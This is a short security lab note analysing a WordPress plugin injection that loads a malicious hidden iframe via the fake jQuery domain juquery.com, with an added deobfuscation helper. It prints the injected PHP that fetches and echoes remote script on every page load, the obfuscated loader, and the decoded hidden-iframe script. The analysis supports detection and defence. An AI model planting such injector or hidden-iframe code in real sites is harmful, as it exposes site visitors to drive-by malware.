New juquery.com injection

Labs Note

Today we found a malicious iframe that was being loaded from juquery.com (another fake jQuery site). It consisted of the following PHP code hidden inside one of the site's plugins:

  // Injected function: fetches a remote "jquery" file over cURL and echoes it
  // into the page <head> via the wp_head hook, so it runs on every page load.
  function browser_compability() {
      if (function_exists('curl_init')) {
          $url = "httx://www. juquery.com/jquery-1.6.3.min.js";
          $ch = curl_init();
          $timeout = 10;
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
          $data = curl_exec($ch);
          curl_close($ch);
          echo "$data";  // whatever the remote server returns is output as-is
      }
  }
  add_action('wp_head', 'browser_compability');

It forces the site to contact juquery.com/jquery-1.6.3.min.js on every page load and output whatever content it provides. It is currently serving the following malicious payload (triggered by SiteCheck):

<script type="text/javascript">var hs_frf=document.createElement("script");hs_frf.setAttribute("type","text/javascript");
var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72..
var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");
document.getElementsByTagName("head")[0]. appendChild(hs_frf);</script>

This first stage loads a second script, hosted at httx://www.juquery.com/compability.php?0.09432658250443637, which creates the iframe:

var _0x2c3c=["\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65...
var hs_ifr=document[_0x2c3c[1]](_0x2c3c[0]);hs_ifr[_0x2c3c[2]]=_0x2c3c[3];var hs_len=...
document[_0x2c3c[14]][_0x2c3c[13]] (hs_ifr);

Decoded, it is the following iframe-loading script:

var hs_ifr = document['createElement']('iframe');
// The iframe URL is hidden as a hex string in the element id.
hs_ifr['id'] = '687474703A2F2F6269742E6C792F31626C31736A66';
var hs_len = hs_ifr['id']['length'];
// Decode two hex digits at a time, appending the characters after the hex.
for (var i = 0; i < hs_len; i += 2) {
    hs_ifr['id'] += String['fromCharCode'](parseInt(hs_ifr['id']['substr'](i, 2), 16));
}
// Keep only the decoded part and use it as the src of an invisible iframe.
hs_ifr['id'] = hs_ifr['id']['substr'](hs_len);
hs_ifr['style']['display'] = 'none';
hs_ifr['style']['width'] = 0;
hs_ifr['style']['height'] = 0;
hs_ifr['src'] = hs_ifr['id'];
document['body']['appendChild'](hs_ifr);
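
As an added example (not code from the original post), a small eval-free helper for peeling both obfuscation layers shown above: `decodeStringArray` resolves a `\xHH` string array like the first-stage loader's, and `decodeHexId` reproduces the hex-in-id trick from the decoded script. The loader line is a constructed sample shaped like the real array, and all function names are assumptions.

```javascript
// Layer 1: every string literal is written as "\xHH" escapes and referenced
// through an array index. Resolve the escapes with a regex instead of eval().
function unescapeHex(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Pull `var _0xNAME=["...","..."]` out of raw source and decode each entry.
function decodeStringArray(src) {
  const m = src.match(/var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\]/i);
  if (!m) throw new Error("no _0x string array found");
  const items = [...m[2].matchAll(/"((?:[^"\\]|\\.)*)"/g)].map((x) => unescapeHex(x[1]));
  return { name: m[1], items };
}

// Layer 2: the iframe URL is stored as hex in the element id and rebuilt with
// a fromCharCode/substr loop. Same transform, with input checking added.
function decodeHexId(hexId) {
  if (hexId.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hexId)) {
    throw new Error("id is not an even-length hex string");
  }
  let out = "";
  for (let i = 0; i < hexId.length; i += 2) {
    out += String.fromCharCode(parseInt(hexId.substr(i, 2), 16));
  }
  return out;
}

// Constructed sample (assumption) shaped like the first-stage loader: entry 0
// is the defanged script URL, entry 1 the Math method used as a cache-buster.
const SAMPLE_LOADER =
  'var _0xa6df=["\\x68\\x74\\x74\\x78\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x6A\\x75' +
  '\\x71\\x75\\x65\\x72\\x79\\x2E\\x63\\x6F\\x6D\\x2F\\x63\\x6F\\x6D\\x70\\x61' +
  '\\x62\\x69\\x6C\\x69\\x74\\x79\\x2E\\x70\\x68\\x70\\x3F","\\x72\\x61\\x6E' +
  '\\x64\\x6F\\x6D"];';

// The hex id quoted in the decoded iframe script above.
const QUOTED_IFRAME_ID = "687474703A2F2F6269742E6C792F31626C31736A66";

function analyse() {
  const loader = decodeStringArray(SAMPLE_LOADER);
  return { loaderStrings: loader.items, iframeSrc: decodeHexId(QUOTED_IFRAME_ID) };
}

console.log(analyse());
```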

It seems that fake jQuery sites are becoming more and more popular; only the official jquery.com and jquery.org domains should be trusted.
